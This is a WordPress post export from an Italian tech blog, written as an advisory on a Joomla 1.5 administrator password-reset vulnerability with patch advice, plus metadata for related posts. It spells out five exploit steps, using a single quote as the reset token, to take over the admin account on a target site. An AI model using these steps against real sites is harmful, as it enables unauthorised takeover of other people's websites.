{"id":173,"date":"2008-08-20T11:39:07","date_gmt":"2008-08-20T09:39:07","guid":{"rendered":"http:\/\/www.work4net.it\/?p=173"},"modified":"2008-08-20T11:39:07","modified_gmt":"2008-08-20T09:39:07","slug":"vulnerabilita-joomla-15-reset-password-administrator","status":"publish","type":"post","link":"https:\/\/www.italiamac.it\/work4net\/2008\/08\/vulnerabilita-joomla-15-reset-password-administrator\/","title":{"rendered":"Vulnerabilit\u00e0 Joomla 1.5 : Reset Password Administrator"},"content":{"rendered":"<p><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/www.work4net.it\/immagini\/2008\/08\/workgroupsbugsquadbe8.jpg?resize=141%2C169\" alt=\"workgroupsbugsquadbe8 Vulnerabilit\u00e0 Joomla 1.5 : Reset Password Administrator\" title=\"workgroupsbugsquadbe8\" width=\"141\" height=\"169\" class=\"alignnone size-medium wp-image-174\" \/><br \/>\n<\/br><br \/>\nJoomla 1.5   ha una vulnerabilit\u00e0 che permette di cambiare la password di administrator in pochi secondi!!!<br \/>\nPer controllare se la vostra versione \u00e8 bacata provare quanto segue:<\/p>\n<blockquote><p>\n1. Go to url : target.com\/index.php?option=com_user&#038;view=reset&#038;layout=confirm<br \/>\n2. Write into field token char &#8216; and Click OK.<br \/>\n3. Write new password for admin<br \/>\n4. Go to url : target.com\/administrator\/<br \/>\n5. Login admin with new password<\/p><\/blockquote>\n<p><\/br><br \/>\n<!--more--><br \/>\n<strong>Patch per risolvere la vulnerabilit\u00e0<\/strong><br \/>\n<\/br><br \/>\nL\u2019exploit \u00e8 stato reso noto il 12\/08\/08, il giorno successivo il team Jommla ha pubblicato le patch, quindi si consiglia caldamente di aggiornare il proprio sito alla versione 1.5.6 per evitare che qualsiasi lamer o script kiddies vi distrugga tutto.<br \/>\n<\/br><br \/>\nSe non volete aggiornare tutto il Core, \u00e8 possibile patchare solamente il file buggato \/components\/com_user\/models\/reset.php con questo <a href=\"http:\/\/www.work4net.it\/download\/reset.phps\"><strong>codice<\/strong><\/a><br \/>\n<\/br><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Joomla 1.5 ha una vulnerabilit\u00e0 che permette di cambiare la password di administrator in pochi secondi!!! Per controllare se la vostra versione \u00e8 bacata provare quanto segue: 1. Go to url : target.com\/index.php?option=com_user&#038;view=reset&#038;layout=confirm 2. Write into field token char &#8216; and Click OK. 3. Write new password for admin 4. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1265,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":"","_links_to":"","_links_to_target":""},"categories":[41,100,7,19],"tags":[314,740,23,800,801,802,803,804],"class_list":["post-173","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-opensource","category-sicurezza","category-tutorial","category-web","tag-exploit","tag-joomla","tag-password","tag-password-patch","tag-patch","tag-reset-password","tag-reset-password-administrator","tag-script-kiddies"],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/www.italiamac.it\/work4net\/wp-content\/uploads\/2013\/08\/workgroupsbugsquadbe8.jpg?fit=141%2C169&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8fSv5-2N","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":340,"url":"https:\/\/www.italiamac.it\/work4net\/2008\/10\/trinity-rescue-kit-azzerare-la-password-di-amministratore-di-windows-vista-o-xp-e-molto-altro\/","url_meta":{"origin":173,"position":0},"title":"Trinity Rescue Kit : Azzerare la password di amministratore di Windows Vista o XP e molto altro&#8230;.","author":"Dev","date":"14 Ottobre 2008","format":false,"excerpt":"Pu\u00f2 accadere che, dopo un certo periodo di inutilizzo di Windows, si dimentichi la password di amministratore per accedere al sistema. Finora, in questi casi, per risolvere il problema l\u2019unica soluzione sarebbe stata quella di formattare il PC e installare nuovamente Windows; altra soluzione sarebbe stata quella di ricorrere a\u2026","rel":"","context":"In &quot;Opensource&quot;","block_context":{"text":"Opensource","link":"https:\/\/www.italiamac.it\/work4net\/category\/opensource\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/www.work4net.it\/immagini\/2008\/10\/trk32-275ss-start-300x244.gif?resize=350%2C200","width":350,"height":200},"classes":[]},{"id":12,"url":"https:\/\/www.italiamac.it\/work4net\/2008\/04\/cambiare-password-dellaccount-administrator-in-xp-home\/","url_meta":{"origin":173,"position":1},"title":"Cambiare Password dell&#8217;account Administrator in XP Home","author":"Dev","date":"1 Aprile 2008","format":false,"excerpt":"In Windows XP Home Edition \u00e8 possibile cambiare la password accedendo in modalit\u00e0 SafeMode. Di default questa password \u00e8 blank. Al fine di rendere il sistema pi\u00f9 sicuro, operare come segue: 1. Spegnere il sistema 2. Riavviare il sistema e premere F8 immediatamente dopo il check del BIOS. Selezionare Safe\u2026","rel":"","context":"In &quot;Tutorial&quot;","block_context":{"text":"Tutorial","link":"https:\/\/www.italiamac.it\/work4net\/category\/tutorial\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/www.italiamac.it\/work4net\/wp-content\/uploads\/2013\/08\/feat_generic.jpg?fit=1022%2C573&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/www.italiamac.it\/work4net\/wp-content\/uploads\/2013\/08\/feat_generic.jpg?fit=1022%2C573&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/www.italiamac.it\/work4net\/wp-content\/uploads\/2013\/08\/feat_generic.jpg?fit=1022%2C573&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/www.italiamac.it\/work4net\/wp-content\/uploads\/2013\/08\/feat_generic.jpg?fit=1022%2C573&ssl=1&resize=700%2C400 2x"},"classes":[]},{"id":50,"url":"https:\/\/www.italiamac.it\/work4net\/2008\/04\/linux-recuperare-la-password-di-root\/","url_meta":{"origin":173,"position":2},"title":"Linux: Recuperare la password di root","author":"Dev","date":"25 Aprile 2008","format":false,"excerpt":"Pu\u00f2 capitare, e pi\u00f9 spesso di quanto uno immagini, che la password del super utente root venga dimenticata. Dimenticare questa password pu\u00f2 significare una limitazione piuttosto grande su una macchina Linux, visto e considerato che se il sistema \u00e8 stato impostato correttamente e voi siete delle persone diligenti, utilizzerete il\u2026","rel":"","context":"In &quot;Opensource&quot;","block_context":{"text":"Opensource","link":"https:\/\/www.italiamac.it\/work4net\/category\/opensource\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/www.italiamac.it\/work4net\/wp-content\/uploads\/2013\/08\/feat_generic.jpg?fit=1022%2C573&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/www.italiamac.it\/work4net\/wp-content\/uploads\/2013\/08\/feat_generic.jpg?fit=1022%2C573&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/www.italiamac.it\/work4net\/wp-content\/uploads\/2013\/08\/feat_generic.jpg?fit=1022%2C573&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/www.italiamac.it\/work4net\/wp-content\/uploads\/2013\/08\/feat_generic.jpg?fit=1022%2C573&ssl=1&resize=700%2C400 2x"},"classes":[]},{"id":119,"url":"https:\/\/www.italiamac.it\/work4net\/2008\/06\/password-builder-la-nuova-creatura-di-paolo-di-leo\/","url_meta":{"origin":173,"position":3},"title":"Password Builder: La nuova creatura di Paolo di Leo","author":"Dev","date":"16 Giugno 2008","format":false,"excerpt":"Password Builder \u00e8 Un generatore di password per le vostre applicazioni, account ecc \u2026 Al momento potete aver maggiori informazioni e scaricare la versione beta al seguente Link.","rel":"","context":"In &quot;Apple Macintosh&quot;","block_context":{"text":"Apple Macintosh","link":"https:\/\/www.italiamac.it\/work4net\/category\/apple\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/www.work4net.it\/immagini\/2008\/06\/password-builder1-300x222.jpg?resize=350%2C200","width":350,"height":200},"classes":[]},{"id":122,"url":"https:\/\/www.italiamac.it\/work4net\/2008\/06\/password-safe-cifra-e-memorizza-le-tue-password-ecco-come-fare-con-il-video-tutorial-in-italiano\/","url_meta":{"origin":173,"position":4},"title":"Password Safe: Cifra e memorizza le tue password, ecco come fare  con il Video Tutorial in italiano","author":"Dev","date":"17 Giugno 2008","format":false,"excerpt":"Password Safe \u00e8 un software gratuito che consente di memorizzare, in un unico database, tutte le proprie password. Sono infatti davvero tante le password che, al giorno d'oggi, debbono essere ricordate. Password Safe permette di risolvere il problema salvandole in sicurezza. Le password possono essere organizzate, all'interno dell'archivio di password\u2026","rel":"","context":"In &quot;Opensource&quot;","block_context":{"text":"Opensource","link":"https:\/\/www.italiamac.it\/work4net\/category\/opensource\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/www.work4net.it\/immagini\/2008\/06\/passwordsafe-300x213.jpg?resize=350%2C200","width":350,"height":200},"classes":[]},{"id":816,"url":"https:\/\/www.italiamac.it\/work4net\/2009\/09\/gestione-della-sicurezza-password-con-policy-di-dominio\/","url_meta":{"origin":173,"position":5},"title":"Gestione della sicurezza password con policy di dominio","author":"Dev","date":"11 Settembre 2009","format":false,"excerpt":"Quando si gestisce un sistema informativo, bisogna fare in modo che questo sia protetto da attacchi pi\u00f9 o meno subdoli. Una delle precauzioni principali da prendere riguarda la gestione delle credenziali d\u2019accesso al sistema, che devono rispondere a specifici criteri di sicurezza che prevengano accessi non autorizzati, in ottemperanza alle\u2026","rel":"","context":"In &quot;Sicurezza&quot;","block_context":{"text":"Sicurezza","link":"https:\/\/www.italiamac.it\/work4net\/category\/sicurezza\/"},"img":{"alt_text":"grouppolicy","src":"https:\/\/i0.wp.com\/www.work4net.it\/immagini\/2009\/09\/grouppolicy-269x300.png?resize=350%2C200","width":350,"height":200},"classes":[]}],"_links":{"self":[{"href":"https:\/\/www.italiamac.it\/work4net\/wp-json\/wp\/v2\/posts\/173","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.italiamac.it\/work4net\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.italiamac.it\/work4net\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.italiamac.it\/work4net\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.italiamac.it\/work4net\/wp-json\/wp\/v2\/comments?post=173"}],"version-history":[{"count":0,"href":"https:\/\/www.italiamac.it\/work4net\/wp-json\/wp\/v2\/posts\/173\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.italiamac.it\/work4net\/wp-json\/wp\/v2\/media\/1265"}],"wp:attachment":[{"href":"https:\/\/www.italiamac.it\/work4net\/wp-json\/wp\/v2\/media?parent=173"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.italiamac.it\/work4net\/wp-json\/wp\/v2\/categories?post=173"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.italiamac.it\/work4net\/wp-json\/wp\/v2\/tags?post=173"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}